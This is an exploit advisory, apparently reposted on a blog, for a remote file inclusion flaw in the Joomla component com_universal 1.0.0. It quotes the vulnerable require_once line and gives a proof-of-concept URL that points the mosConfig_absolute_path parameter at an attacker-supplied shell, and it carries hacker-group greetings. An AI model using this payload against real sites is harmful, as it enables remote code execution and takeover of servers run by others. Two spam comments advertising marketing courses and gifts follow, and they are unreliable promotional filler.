Joomla component com_universal <= Remote File Inclusion Vulnerability

=====================================================================
Joomla component com_universal <= Remote File Inclusion Vulnerability
=====================================================================

[+]Software: Joomla component com_universal (UWCMS Universal Web CMS)
[+]Version: 1.0.0
[+]License: http://www.gnu.org/copyleft/gpl.html GNU/GPL
[+]Source: http://uwcms.sourceforge.net
[+]CWE ID : 98
[+]Security Risk: High
[+]Remote Exploit: Yes

###########################################################
[+]Author: eidelweiss
[+]Contact: eidelweiss[at]cyberservices[dot]com
[+]Thank`s: sp3x (securityreason) - JosS (hack0wn) - r0073r & 0x1D (inj3ct0r)
[+]Special: [D]eal [C]yber - syabilla_putri (miss u) , psychotic_girl (dodol :P) , all my friends
###########################################################

-=[ VULN ]=-

[-] /includes/config/config.html.php

global $mosConfig_absolute_path;
require_once($mosConfig_absolute_path."/administrator/components/com_universal/includes/config/configuracion.php");

-=[ P0C ]=-

http://127.0.0.1//administrator/components/com_universal/includes/config/config.html.php?mosConfig_absolute_path= [sh3ll inj3ct0r]

###########################################################

2 comments:

  1. Learn digital marketing masters course online for free. Stop wasting your time in searching apply now limited seats are left click the links below to register-
    1)digital marketing in Ahmedabad
    2)digital marketing agency in chandigarh
    3)best digital marketing agency in gurgaon
    4)Digital Marketing Company in Lucknow
    5)Digital Marketing Company in Lucknow

    ReplyDelete
  2. I absolutely love the content that you share with us, It's easy to understand your article and it makes my work easier. Thank you for sharing your insights with us.
    Valentine’s Day Gifts
    Valentine’s Day Gifts
    Valentine Chocolate Day Gift
    Valentine’s Day Chocolate
    Valentine’s Day Gifts

    ReplyDelete